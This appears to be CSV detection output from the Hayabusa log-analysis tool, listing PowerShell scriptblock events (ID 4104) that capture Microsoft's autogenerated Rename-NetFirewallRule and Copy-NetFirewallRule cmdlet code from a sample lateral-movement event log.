(@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') 
} if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 
'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdlet",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { 
[object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetFirewallRule' -Alias '*' function Copy-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] 
[OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, 
ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] 
[Parameter(ParameterSet",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetFirewallRule' -Alias '*' function Copy-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] 
[string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] 
[ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSet",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious 
PwSh,"Name='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] 
